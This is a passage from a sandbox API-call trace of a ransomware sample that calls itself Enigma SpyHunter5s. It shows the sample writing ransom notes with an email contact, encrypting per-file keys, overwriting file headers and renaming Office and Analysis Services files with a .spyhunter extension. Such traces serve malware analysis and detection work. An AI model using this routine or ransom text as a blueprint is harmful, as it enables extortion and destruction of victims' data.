0x2c0000 [0166.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.787] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.spyhunter") returned 82 [0166.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Office\\Office14\\1033\\MAPISHELLR.DLL.spyhunter" (normalized: "c:\\program files (x86)\\microsoft office\\office14\\1033\\mapishellr.dll.spyhunter")) returned 1 [0166.788] GetProcessHeap () returned 0x2c0000 [0166.788] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.788] GetProcessHeap () returned 0x2c0000 [0166.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.789] GetProcessHeap () returned 0x2c0000 [0166.789] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4d30 | out: hHeap=0x2c0000) returned 1 [0166.789] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft analysis services\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.789] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0166.789] WriteFile (in: hFile=0xa0, lpBuffer=0x57e67b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e7a4, lpOverlapped=0x0 | out: lpBuffer=0x57e67b*, lpNumberOfBytesWritten=0x57e7a4*=0x127, lpOverlapped=0x0) returned 1 [0166.791] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0166.791] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e7a4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e7a4*=0x2ac, lpOverlapped=0x0) returned 1 [0166.791] CloseHandle (hObject=0xa0) returned 1 [0166.791] GetProcessHeap () returned 0x2c0000 [0166.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7de90 | out: hHeap=0x2c0000) returned 1 [0166.791] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.792] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0166.792] WriteFile (in: hFile=0xa0, lpBuffer=0x57e677*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e7a0, lpOverlapped=0x0 | out: lpBuffer=0x57e677*, lpNumberOfBytesWritten=0x57e7a0*=0x127, lpOverlapped=0x0) returned 1 [0166.793] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0166.793] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e7a0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e7a0*=0x2ac, lpOverlapped=0x0) returned 1 [0166.793] CloseHandle (hObject=0xa0) returned 1 [0166.793] GetProcessHeap () returned 0x2c0000 [0166.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ecebf0 | out: hHeap=0x2c0000) returned 1 [0166.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.794] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0166.794] WriteFile (in: hFile=0xa0, lpBuffer=0x57e673*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x57e673*, lpNumberOfBytesWritten=0x57e79c*=0x127, lpOverlapped=0x0) returned 1 [0166.795] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0166.795] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e79c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e79c*=0x2ac, lpOverlapped=0x0) returned 1 [0166.795] CloseHandle (hObject=0xa0) returned 1 [0166.795] GetProcessHeap () returned 0x2c0000 [0166.796] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eceb00 | out: hHeap=0x2c0000) returned 1 [0166.796] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.796] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0166.796] WriteFile (in: hFile=0xa0, lpBuffer=0x57e66f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e798, lpOverlapped=0x0 | out: lpBuffer=0x57e66f*, lpNumberOfBytesWritten=0x57e798*=0x127, lpOverlapped=0x0) returned 1 [0166.797] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0166.797] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e798, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e798*=0x2ac, lpOverlapped=0x0) returned 1 [0166.798] CloseHandle (hObject=0xa0) returned 1 [0166.798] GetProcessHeap () returned 0x2c0000 [0166.798] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9dc8 | out: hHeap=0x2c0000) returned 1 [0166.798] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.799] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0166.799] WriteFile (in: hFile=0xa0, lpBuffer=0x57e66b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x57e66b*, lpNumberOfBytesWritten=0x57e794*=0x127, lpOverlapped=0x0) returned 1 [0166.799] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0166.800] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57e794, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57e794*=0x2ac, lpOverlapped=0x0) returned 1 [0166.800] CloseHandle (hObject=0xa0) returned 1 [0166.800] GetProcessHeap () returned 0x2c0000 [0166.800] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec8240 | out: hHeap=0x2c0000) returned 1 [0166.800] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e730 | out: pbBuffer=0x57e730) returned 1 [0166.800] GetProcessHeap () returned 0x2c0000 [0166.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.800] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e728*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e728*=0x30) returned 1 [0166.800] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.801] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll") returned 95 [0166.801] StrStrW (lpFirst="msolui100.rll", lpSrch=".txt") returned 0x0 [0166.801] GetProcessHeap () returned 0x2c0000 [0166.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.801] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e6ec*=0x2800, lpOverlapped=0x0) returned 1 [0166.818] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.818] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e6ec*=0x2800, lpOverlapped=0x0) returned 1 [0166.818] GetProcessHeap () returned 0x2c0000 [0166.818] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.819] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.819] WriteFile (in: hFile=0xa0, lpBuffer=0x57e72c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6ec, lpOverlapped=0x0 | out: lpBuffer=0x57e72c*, lpNumberOfBytesWritten=0x57e6ec*=0x4, lpOverlapped=0x0) returned 1 [0166.819] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6ec*=0x30, lpOverlapped=0x0) returned 1 [0166.819] CloseHandle (hObject=0xa0) returned 1 [0166.819] GetProcessHeap () returned 0x2c0000 [0166.819] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.819] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.spyhunter") returned 105 [0166.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll.spyhunter")) returned 1 [0166.821] GetProcessHeap () returned 0x2c0000 [0166.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0166.821] GetProcessHeap () returned 0x2c0000 [0166.821] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.822] GetProcessHeap () returned 0x2c0000 [0166.822] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea9cc0 | out: hHeap=0x2c0000) returned 1 [0166.822] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e730 | out: pbBuffer=0x57e730) returned 1 [0166.822] GetProcessHeap () returned 0x2c0000 [0166.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.822] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e728*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e728*=0x30) returned 1 [0166.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.822] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll") returned 79 [0166.823] StrStrW (lpFirst="msmgdsrv.dll", lpSrch=".txt") returned 0x0 [0166.823] GetProcessHeap () returned 0x2c0000 [0166.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0166.823] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57e6ec*=0x2800, lpOverlapped=0x0) returned 1 [0166.826] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.826] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e6ec, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57e6ec*=0x2800, lpOverlapped=0x0) returned 1 [0166.826] GetProcessHeap () returned 0x2c0000 [0166.826] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0166.827] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.827] WriteFile (in: hFile=0xa0, lpBuffer=0x57e72c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6ec, lpOverlapped=0x0 | out: lpBuffer=0x57e72c*, lpNumberOfBytesWritten=0x57e6ec*=0x4, lpOverlapped=0x0) returned 1 [0166.850] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6ec, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6ec*=0x30, lpOverlapped=0x0) returned 1 [0166.850] CloseHandle (hObject=0xa0) returned 1 [0166.850] GetProcessHeap () returned 0x2c0000 [0166.850] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0166.850] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.spyhunter") returned 89 [0166.850] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmgdsrv.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmgdsrv.dll.spyhunter")) returned 1 [0166.851] GetProcessHeap () returned 0x2c0000 [0166.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0166.851] GetProcessHeap () returned 0x2c0000 [0166.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0166.851] GetProcessHeap () returned 0x2c0000 [0166.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eea810 | out: hHeap=0x2c0000) returned 1 [0166.851] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57e728 | out: pbBuffer=0x57e728) returned 1 [0166.851] GetProcessHeap () returned 0x2c0000 [0166.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0166.851] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x57e720*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x57e720*=0x30) returned 1 [0166.851] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0166.852] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll") returned 80 [0166.852] StrStrW (lpFirst="msmdlocal.dll", lpSrch=".txt") returned 0x0 [0166.852] GetProcessHeap () returned 0x2c0000 [0166.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0166.852] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57e6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x57e6e4*=0x2800, lpOverlapped=0x0) returned 1 [0166.854] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0166.854] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x57e6e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x57e6e4*=0x2800, lpOverlapped=0x0) returned 1 [0166.854] GetProcessHeap () returned 0x2c0000 [0166.854] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0166.854] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0166.855] WriteFile (in: hFile=0xa0, lpBuffer=0x57e724*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57e6e4, lpOverlapped=0x0 | out: lpBuffer=0x57e724*, lpNumberOfBytesWritten=0x57e6e4*=0x4, lpOverlapped=0x0) returned 1 [0166.961] WriteFile (in: hFile=0xa0, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57e6e4, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x57e6e4*=0x30, lpOverlapped=0x0) returned 1 [0166.961] CloseHandle (hObject=0xa0) returned 1 [0166.961] GetProcessHeap () returned 0x2c0000 [0166.961] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0166.961] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.spyhunter") returned 90 [0166.961] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\msmdlocal.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\msmdlocal.dll.spyhunter" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as 